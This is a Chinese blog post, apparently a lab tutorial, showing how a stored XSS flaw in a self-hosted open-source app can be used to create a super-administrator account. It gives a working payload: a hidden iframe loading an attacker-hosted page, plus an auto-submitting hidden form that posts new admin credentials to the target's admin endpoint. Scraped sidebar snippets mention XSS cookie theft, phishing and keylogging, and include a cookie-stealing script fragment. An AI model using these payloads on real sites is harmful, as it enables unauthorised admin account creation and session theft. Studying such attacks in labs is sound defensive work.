xss利用之后台创建超级管理员用户

最新推荐文章于 2024-05-13 10:13:59 发布
最新推荐文章于 2024-05-13 10:13:59 发布
阅读量1.1k 收藏
点赞数 1
文章标签: 安全 xss 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48421613/article/details/108269355
版权

xss利用之创建超级管理员账户

  • 首先需要声明的是,我们这次讲解的小案例是开源的一个环境,并不是盲打xss,也就是说我们是可以在自己的服务器上搭建环境而后进行一系列的测试

  • 现我们在靶场找到存储型(持久型)xss注入,我们该如何通过xss创建账户呢?

    • 首先我们在本地创建一个新的管理员账户,而后使用火狐浏览器查看头信息以及payload

    • 在这里插入图片描述

    • 在这里插入图片描述

    • 在这里插入图片描述

    • 通过观察我们可以看到我们提交的内容,我们可以通过模仿form表单进行提交,接下来我们将会使用到

    • <iframe src="http://10.10.87.220/xss.html" width="0" height="0"></iframe>
将此payload插入到执行代码,会执行我们指定的html脚本


    • <form action="http://www.baji.com/jj/admin.php?c=a_adminuser&a=add&run=1" name="form1" method="post">
    <input type="hidden" name="auid" value="">
	<input type="hidden" name="auser" value="text">
	<input type="hidden" name="apass" value="text212121">
	<input type="hidden" name="gid" value="1">
	<input type="hidden" name="level" value="1">
	<input type="hidden" name="aname" value="">
	<input type="hidden" name="amail" value="">
	<input type="hidden" name="atel" value="">
	<button type="submit" name="ok">ok</button>
</form>
<script>
    document.form1.submit();
</script>

    -在这里插入图片描述

  • 超级管理员添加成功了,但是在实验的过程中发现很多时候代码执行但是超级管理员并没有添加,在多次刷新之后才出来,建议大家关闭浏览器重新打开或者清理一下浏览器缓存

vlan911
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Discuz x3.2 xss获取管理员权限
weixin_34348805的博客
04-12 888
0x00 说说xss 跨站脚本(Cross-site scripting,通常简称为XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网...
XSS后台敏感操作(审计思路实现)
gl620321的博客
08-10 970
一、XSS后台敏感操作问题的审计 1、XSS是什么? XSS表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击中以以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,二在XSS攻击中,通过插入恶意脚本,实现对用户浏览器的控制。 2、XSS攻击可以分成两种类型 非持久性攻击:非持久性XSS攻击是一次性的,仅对当次的页面访问产生影响 持久性攻击:持久性XSS攻...
后台管理系统--测试用例设计
m0_59453408的博客
05-13 613
后台管理系统的测试用例设计
使用pikachu管理工具下的XSS后台进行实战
北冥同学的成长记录笔记
07-29 3355
pikachu管理工具下的XSS后台是一个通过Cookie窃取和利用、钓鱼攻击、键盘行为记录这三个实战型实验来帮助学习者理解XSS漏洞的原理和危害的一个平。旨在帮助学习者在实战中深入理解理论,从而可以更好的防御XSS漏洞。
Web渗透测试之XSS攻击:针对管理员XSS攻击
vodkaDL的博客
12-23 1062
文章目录前言准备工作反射型XSS存储型XSS总结 前言   管理员权限的重要性不言而喻,而在渗透测试中如果能够获得管理员权限,无疑将会奠定胜利的基调。本篇将讲述如何利用XSS漏洞冒充管理员,从而达到获得管理员权限的目的。 准备工作   在攻击者的服务器端准备脚本执行文件以及cookie获得网页: getcookie.js: var img = document.createElement('img'); img.src = "http://127.0.0.1/xss/getcookie.php?COOKIE
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程
weixin_30591551的博客
03-04 225
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程 https://pan.baidu.com/s/1hq4LsmK 转载于:https://www.cnblogs.com/k8gege/p/10474217.html
cloudapps-超级管理员
02-10
"cloudapps-超级管理员"项目是一个基于JavaScript技术构建的云端应用程序管理平,主要服务于系统管理员,尤其是超级管理员,提供全面的权限控制、用户管理、应用部署等核心功能。在这个项目中,JavaScript作为主要...
ASP办公系统后台代码
11-02
这可能涉及到角色管理,如超级管理员、普通员工等,每个角色有不同的权限集。 3. **数据处理**:后台代码需要与数据库交互,执行CRUD操作(创建、读取、更新、删除)。这涉及到SQL语句的编写和优化,以及事务处理,...
phpmywind_v:多版本后台
03-23
4. **权限管理**:为了确保后台安全性,phpmywind_v很可能包含一套完整的权限管理系统,允许管理员分配不同级别的访问权限给不同用户角色,如超级管理员、普通管理员、编辑等。 5. **模板引擎**:多版本后台可能...
IIS5.0超级管理手册-网页开发篇
11-24
《IIS5.0超级管理手册-网页开发篇》是一份详尽的指南,专注于介绍如何管理和开发在IIS5.0(Internet Information Services 5.0)上运行的网页应用。IIS是微软公司发布的一款强大的Web服务器,广泛应用于Windows操作...
0024美工超级漂亮的ASP卫生纸公司修正版源码
05-10
5. 反馈系统:Feedback.asp代表了网站的反馈系统,用户可以通过这个模块向网站管理员发送建议或问题,有助于提升服务质量,及时解决问题。 6. 公司概况与荣誉:CompVisualize.asp和CompHonor.asp可能分别展示公司...
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4098
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
全网最详细 XSS 跨站脚本攻击,不是过来打死我!!
liuhyusb的博客
06-21 2613
​。
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3887
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss利用,post型xss利用XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用:cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
一个危险的XSS案例——轻松拿到登录用户的cookie
dengrong8117的博客
06-06 1328
casperchen from IMWeb Team. 站酷是我很喜欢的设计类站点,上面有我大二美好的回忆,卖个广告,我的个人主页是:http://www.zcool.com.cn/u/346408 很好,其实上面不是重点。这段时间周围出现了好几单安全相关的问题,基本都是XSS漏洞导致的。于是内心一直惦记着,包括上个周末在逛站酷的时候,然后突发奇想:站酷上是否也存在XSS...
js获取header_【超详细入门教程】通过xss获取管理员明文账号密码
weixin_39662611的博客
12-01 673
0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了,也就是说xss无法读取到cookie了(除了包含登...
通过XSS注入获取管理员cookie
qq_39215211的博客
04-02 1539
通过XSS注入获取管理员cookie==实验环境==1、WAMP2、Firefox 游览器3、在线靶场4、WINDOWS系统==实验准备==首先在wamp的www目录下准备两个文件新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出
web漏洞利用---XSS注入攻击
m0_65129142的博客
12-20 5408
XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSSXSS注入攻击的原理其实和SQL注入攻击的原理很相似,攻击者将恶意的Script代码插入到网页中,当正常用户浏览该页面时,被嵌入的恶意Script代码就会被执行,从而达到恶意攻击正常用户的目的。 XSS分类 跨站脚本注入漏洞是由于WEB服务器读取了用户可控数据输出到HTML页面的过程中没有进行安全处理
dedecms的xss漏洞冒充管理员
最新发布
06-13
关于DEDECMS的XSS漏洞冒充管理员的情况,通常指的是系统中的某种输入验证不足或过滤不严,使得攻击者可以通过构造特定的输入,比如包含HTML或JavaScript代码,来绕过身份验证机制,使用户的浏览器执行看似来自管理员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值